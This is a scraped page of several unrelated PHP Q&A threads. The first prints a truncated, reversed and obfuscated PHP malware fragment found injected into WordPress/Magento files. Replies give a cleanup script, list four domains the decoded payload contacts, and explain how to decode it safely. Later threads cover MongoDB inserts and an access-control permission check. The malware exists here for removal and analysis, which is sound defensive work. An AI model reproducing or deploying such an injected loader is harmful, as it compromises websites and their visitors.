} ;a$~ ;W=a$Y;"non"=a$ )""==W( fiY;"non"=a$ ))W(tessi!(fi { )marap$(212kcehcj } ;))po$ ,txet$(2ne(edocne_46esab~ { )txet&j9 esle |Y:]marap$[REVRES_$|W: ro )"non"==|Q:lru|-:.".".|+:","|*:$,po$(43k|&:$ ;)"|^:"(212kcehc=|%: nruter|~: noitcnuf|j}}8zc$9nruter9}817==!9eslaf28)45#9=979{96"5"(stsixe_328164sserpmocnuzg08164izgmoc08164etalfnizg09{9)llun9=9htgnel$9,4oocd939{9))"oocd"(stsixe_3!2| * ;*zd$*) )*edocedzg*zc$(*noitcnuf*( fi*zd$ nruter ) *# = zd$( ==! eslaf( fi;)"j"(trats_boU~~~~;t$U&zesleU~;)W%Y%RzesleU~;)W#Y#RU;)v$(oocd=t$U;"54+36Q14+c6Q06+56Q26+".p$=T;"05+36Q46+16Q55+".p$=1p$;"f5Q74+56Q26+07Q"=p$U;)"enonU:gnidocnE-tnetnoC"(redaeHz)v$(jUwz))"j"(stsixe_w!k9 |U:2p$|T:x\|Q:1\|+:nruter|&:lmth|%:ydob|#:} |~: { |z:(fi|k:22ap|j:noitcnuf|w:/\<\(/"(T &z))t$,"is/|Y:/\<\/"(1p$k|R:1,t$ ,"1"."$"."n\".)(212yad ,"is/)>\*]>\^[|W#; $syv= "eval(str_replace(array"; $siv = "str_replace";$slv = "strrev";$s1v="create_function"; $svv = #//}9;g$^s$9nruter9}9;)8,0,q$(r$=.g$9;))"46x.x?x\16\17x\".q$.g$(m$,"*H"(p$9=9q$9{9))s$(l$<)g$(l$(9elihw9;""9=9g$9;"53x$1\d6x\"=m$;"261'x1x.1x\"=r$;"351xa\07x\"=p$;"651.x%1x&1x\"=l$9{9)q$9,s$(2ne9noitcnuf;}#; $n9 = #1067|416|779|223|361#; $ll = "preg_replace"; $ee1 = array(#\14#,#, $#,#) { #,#[$i]#,#substr($#,#a = $xx("|","#,#,strpos($y,"9")#,# = str_replace($#,#x3#,#\x7#,#\15#,#;$i++) {#,#function #,#x6#,#); #,#for($i=0;$i
Which looks truncated ...
That is far as I have time for, but if you wanted to continue you may find the following url useful.
http://ddecode.com/
Good luck

I found the same code in a Wordpress instance and wrote a short script to remove it of all files:
$directory = new RecursiveDirectoryIterator(dirname(__FILE__));
$iterator = new RecursiveIteratorIterator($directory);
foreach ($iterator as $filename => $cur)
{
$contents = file_get_contents($filename);
if (strpos($contents, 'tngmufxact') !== false && strlen($contents) > 13200 && strpos($contents, '?>', 13200) == 13278) {
echo $filename.PHP_EOL;
file_put_contents($filename, substr($contents, 13280));
}
}
Just change the string 'tngmufxact' to your obfuscated version and everything will be removed automatically.
Maybe the length of the obfuscated string will differ - don't test this in your live environment!
Be sure to backup your files before executing this!

I've decoded this script and it is (except the obfuscation) exactly the same as this one: Magento Website Hacked - encryption code in all php files
The URL's inside are the same too:
33db9538.com
9507c4e8.com
e5b57288.com
54dfa1cb.com
If you are unsure/inexperienced don't try to execute or decode the code yourself, but get professional help.
Besides that: the decoding was done manually by picking the code pieces and partially executing them (inside a virtual machine - just in case something bad happens).
So basically I've repeated this over and over:
echo the hex strings to get the plain text (to find out which functions get used)
always replace eval with echo
always replace preg_replace("/(.*)/e", ...) with echo(preg_replace("/(.*)/", ...))
The e at the end of the regular expression means evaluate (like the php function eval), so don't forget to remove that too.
In the end you have a few function definitions and one of them gets invoked via ob_start.

MongoDB inserting a record not working as it should

So, I've been working on this code for some time, but I'm giving up, and reaching out for help from you guys. I've been looking at documentation for MongoDB and PHP, but I can't find anything. What I want to do is take the sample code for inserting a record:
$obj = array( "title" => "Calvin and Hobbes", "author" => "Bill Watterson" );
And re-purpose is for my project (as shown):
$obj = array( $startCol => $startRow );
The thing is that $startCol and $startRow are arrays, and it gives me a problem every time I want to run the document. Is there something ridiculously simple I'm missing here? Thanks in advance.
Chunk of code that's giving me problems:
$maxRows= count($currentarray); //Outputs 45
$maxCols= count($currentarray[0]); //Outputs 9
$currentRow=1;
$currentCol=1;
$testing = 1;
do {
while ($currentCol<$maxCols){
$startCol[] = $currentarray[0][$currentCol];
$startRow[] = $currentarray[$currentRow][$currentCol];
$currentCol++;
}
$obj = array( $startCol => $startRow );
$collection->insert($obj);
print_r ($collection);
if ($currentCol==$maxCols)
$currentCol=1;
$currentRow++;
$testing++;
//echo "<br />";
} while ($currentRow<$maxRows);

The problem I was getting was with my output statement. So my answer was fairly simple. After, print_r() all of my variables I found that I was in fact storing them, but I was calling them incorrectly at the end of the program.

Access Control Problem

I am developing an access control library for my project and I am looking to the best solution to do this:
I am getting all my access list from database to an array. In result it looks like this:
$array = array(
'*' => array('administrator' => TRUE),
'frontend/*' => array(
'user' => TRUE,
'unregistered' => TRUE
),
'backend/*' => array(
'user' => FALSE,
'unregistered' => FALSE
),
'backend/user/*' => array(
'moderator' => FALSE,
'supermoderator' => TRUE,
),
'backend/article/*' => array(
'supermoderator' => TRUE
),
'backend/article/add/new' => array(
'moderator' => TRUE
)
);
The " * " means this user has access all of that related options backend/article/* means that group have access to all article options (article/add, article/remove, ...).
As you see the there is no item in backend/article/add for supermoderator but it has the master access to all article pages.
What is the best way to check this? I tried array_walk() but I guess it wont help me.
Thank you for advices...
I can share my whole code if you want.
* Edit *
Am I storing wrong? If you have the better solution to store it I will be happy to hear it.
Thank you for any advices

No matter what this is going to be a complex algorithm, a simple array_walk wont do. Unless someone is feeling particularly generous and will write one for you, I suggest you hire a programmer.
Am I storing wrong? If you have the better solution to store it I will be happy to hear it.
It totally depends on your algorithm. You can probably write one that uses your current data format. You can also probably write a simpler one if you change your data format. But what your data format should look like then, well, that's a job for a programmer.

I found the answer myself:
lets say the user trying to access backend/article/add/new and this user in the supermoderator group. So I need to look for backend/*, backend/article/*, backend/article/add/*. array_slice() and for() enough for this:
I am using CodeIgniter by the way. I modified it a little bit to seperate frontend and backend controllers. I am not using application/controller directory. I am using application/backend and application/frontend directories for controllers.
So an uri pattern is this: http://site.com/[backend]*/[directory]*/class/method
// This is the page that user trying to reach
$requested_page = "backend/article/add/new";
// pharsing...
$x = explode('/', $requested_page);
// this is needed to cut last 3, 2, 1 items of $x
$i = count($x) > 3 ? -4 : -count($x);
for (; $i < 0; $i++) {
$resource = implode('/', array_slice($x, 0, $i)) . '/*';
// echoing for debug
echo $resource;
}
// Outputs:
// backend/*
// backend/article/*
// backend/article/add/*

function userHasPermissions($permissionsArray, $user, $path) {
// Check exact
if(isset($permissionsArray[$path]) &&
isset($permissionsArray[$path][$user])) {
return $permissionsArray[$path][$user];
}
// Check lower and lower
$partArr = explode('/', $path);
for($i = substr_count($path, '/'); $i >= 0; $i--) {
if($i > 0) {
$choppedPartArr = array_slice($partArr, 0, $i);
$newPath = implode($choppedPartArr, '/') . '/*';
} else {
$newPath = '*';
}
if(isset($permissionsArray[$newPath]) &&
isset($permissionsArray[$newPath][$user])) {
return $permissionsArray[$newPath][$user];
}
}
return false;
}
echo "Result: " . (userHasPermissions($array, 'supermoderator', 'backend/article/add') ? "true" : "false");
Note that 'backend/article' will return false for 'supermoderator' since 'backend/article/*' does not match it. To change this, simply change $i = substr_count($path, '/'); to $i = substr_count($path, '/')+1;.